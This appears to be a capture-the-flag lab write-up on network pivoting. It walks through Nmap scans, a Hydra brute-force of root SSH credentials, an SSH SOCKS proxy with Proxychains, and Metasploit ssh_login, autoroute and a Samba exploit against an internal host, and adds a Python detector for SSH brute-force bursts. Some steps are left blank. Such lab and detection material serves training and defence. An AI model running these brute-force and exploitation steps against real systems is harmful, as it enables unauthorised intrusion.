Pivoting VII
Steps Taken:

1. Scan the target machine with Nmap:

   ```bash
   nmap -sV --script=banner {target-ip}
   ```

2. Since SSH is available, use Hydra to brute-force the credentials:

   ```bash
   hydra {target-ip-internal-network} ssh -t 4 -l root -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-40.txt -f -V
   ```
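As an added defender-side counterpart to step 2 (this is my own example, not part of the original lab notes): a Hydra run like the one above leaves a burst of `Failed password` entries in the target's sshd log, followed by a single `Accepted password` once the wordlist hits. The script below flags both patterns in a sliding time window; the log excerpt, hostname and IP addresses in it are constructed placeholders.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sshd log excerpt, not taken from the lab; host and IPs are placeholders.
SAMPLE_AUTH_LOG = """\
Jan 10 12:00:01 pivot sshd[2101]: Failed password for root from 10.0.0.5 port 50122 ssh2
Jan 10 12:00:02 pivot sshd[2103]: Failed password for root from 10.0.0.5 port 50124 ssh2
Jan 10 12:00:02 pivot sshd[2105]: Failed password for root from 10.0.0.5 port 50126 ssh2
Jan 10 12:00:03 pivot sshd[2107]: Failed password for root from 10.0.0.5 port 50128 ssh2
Jan 10 12:00:03 pivot sshd[2109]: Failed password for root from 10.0.0.5 port 50130 ssh2
Jan 10 12:00:04 pivot sshd[2111]: Accepted password for root from 10.0.0.5 port 50132 ssh2
Jan 10 12:05:00 pivot sshd[2200]: Accepted publickey for alice from 10.0.0.9 port 41000 ssh2
"""

# Matches the sshd "Failed/Accepted <method> for [invalid user] <user> from <ip>" lines.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>\w+) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+"
)


def detect_ssh_bruteforce(log_text, threshold=5, window_seconds=60, year=2024):
    """Return alerts for (a) >= threshold failures from one IP inside the window and
    (b) a password login that succeeds while such a burst is still inside the window."""
    failures = defaultdict(list)   # source IP -> timestamps of recent failures
    alerted = set()                # IPs already reported as a burst
    alerts = []
    window = timedelta(seconds=window_seconds)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        ip = m["ip"]
        # Drop failures that have fallen out of the sliding window.
        recent = [t for t in failures[ip] if ts - t <= window]
        if m["result"] == "Failed":
            recent.append(ts)
            if len(recent) >= threshold and ip not in alerted:
                alerted.add(ip)
                alerts.append({"type": "burst", "ip": ip, "count": len(recent)})
        elif m["method"] == "password" and len(recent) >= threshold:
            alerts.append({"type": "success_after_failures", "ip": ip, "user": m["user"]})
        failures[ip] = recent
    return alerts
```

On the sample log this yields one `burst` alert for the source IP and one `success_after_failures` alert for `root`; the key-based login from the other address produces nothing.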
3. Set up dynamic port forwarding (a SOCKS proxy) on this SSH session through the first compromised machine:

   ```bash
   ssh -D 9050 root@{target-ip}
   ```

4. Make sure that the port forwarding is actually enabled by checking it using:

   on another terminal session and NOT on the same session where the SSH login was done.

5. Run Nmap through Proxychains over this proxy:

   ```bash
   proxychains nmap -sT -Pn {target-ip-internal} -v
   ```

   - This shows that ports 139 and 445 are open on the target machine inside the internal network.

6. Reviewing the previous pivoting labs, we used the “exploit/linux/…/is_pipe…” exploit. Let’s try that one in this lab as well.

   - We can't run the Metasploit exploit here yet, since we need autoroute to create a pivot through this compromised machine. But how do you do that with this given SSH session?
   - First, set up the database for Metasploit:

     ```bash
     service postgresql start
     msfdb init
     msfconsole -q
     msf > db_status
     ```

   - Second, use "auxiliary/scanner/ssh/ssh_login". This creates a Metasploit session over this SSH login, so we can create a pivot with "autoroute" in Metasploit on that session. In this case there is NO NEED FOR THE DYNAMIC PORT FORWARDING, since we need to use the exploit from Metasploit in the first place.

     ```bash
     msf > use auxiliary/scanner/ssh/ssh_login
     msf > set RHOSTS 192.30.160.3
     msf > set USERNAME root
     msf > set PASSWORD 1234567890
     msf > exploit
     ```

   - See another session created? Now you can upgrade it to Meterpreter:

     ```bash
     msf > sessions -u 1
     ```

   Reference: https://nullsweep.com/pivot-cheatsheet-for-pentesters/

7. Now, create the pivot on this compromised machine with the SSH session:

   - Note that if there were a way for us to send the exploit through the dynamic port forwarding with just SSH, we wouldn't need Metasploit to create a pivot before sending the exploit.

8. In this case, we use the same Samba exploit as in the previous labs, since using a different exploit does not seem to be the point of this box.

9. Get the flag: